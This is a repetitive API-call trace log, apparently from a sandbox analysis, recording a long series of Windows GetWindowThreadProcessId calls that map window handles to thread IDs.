	[0947.813] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xf48
	[0947.813] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xe40
	[0947.813] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xecc
	[0947.813] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xeb8
	[0947.813] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xe80
	[0947.813] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xe98
	[0947.813] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xe60
	[0947.813] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xee4
	[0947.813] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xf00
	[0947.813] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xdf0
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xe1c
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xdd0
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xd94
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xd74
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xd00
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xcd8
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xc84
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xca4
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xc64
	[0947.814] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xc24
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xb84
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xbac
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x384
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xab8
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x33c
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xa44
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xa64
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x8a8
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xaf0
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x88c
	[0947.815] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xb04
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x910
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x230
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xac0
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xab4
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xaac
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x3d0
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x978
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xa7c
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x59c
	[0947.816] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xa88
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xa6c
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xa68
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x9f8
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xa04
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x924
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x8dc
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x7dc
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x768
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x764
	[0947.817] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x820
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x810
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x794
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x83c
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x7ac
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xb44
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x6bc
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xb5c
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x838
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.818] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x818
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x5b8
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x494
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1ec
	[0947.819] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x440
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x7e8
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x730
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2c8
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x31c
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x330
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x128
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x5c8
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x6f8
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x358
	[0947.820] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x73c
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xb0
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x250
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x240
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x790
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x61c
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x540
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x538
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x568
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x538
	[0947.821] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x568
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x538
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x540
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x540
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x57c
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x460
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x554
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x528
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.822] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x79c
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4e0
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x460
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x460
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x44c
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x778
	[0947.823] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x460
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x558
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x10bd8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x25d8
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x10bb8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2594
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x10baa, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2590
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x10b76, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2530
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x10b68, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x251c
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x10b64, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2254
	[0947.824] GetWindowThreadProcessId (in: hWnd=0x10b60, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2250
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x16f0
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1338
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1ca0
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x238c
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b08
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1a8c
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x18e0
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2344
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1d8c
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1038
	[0947.825] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1a58
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c7c
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1f04
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x18b8
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x22c8
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x21b8
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x21c0
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x219c
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x20f4
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x20e4
	[0947.826] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x20e8
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x20ec
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x20f0
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e34
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xc38
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1fe4
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1f10
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1f0c
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1f08
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1ef0
	[0947.827] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1eec
	[0947.828] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1ee4
	[0948.531] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1ed8
	[0948.531] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1ed0
	[0948.531] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e8c
	[0948.531] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e88
	[0948.531] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e84
	[0948.531] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1604
	[0948.531] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c2c
	[0948.531] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c08
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c0c
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c10
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c14
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c18
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c1c
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x16fc
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e78
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c20
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x191c
	[0948.532] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1748
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1bb4
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x10bc
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b50
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x14b4
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x149c
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x14a8
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1490
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x14a4
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x148c
	[0948.533] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1458
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b4c
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b3c
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x19bc
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x199c
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1998
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1994
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1990
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1984
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x197c
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1978
	[0948.534] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1824
	[0948.535] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1088
	[0948.535] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1908
	[0948.535] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x18cc
	[0948.535] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x18d0
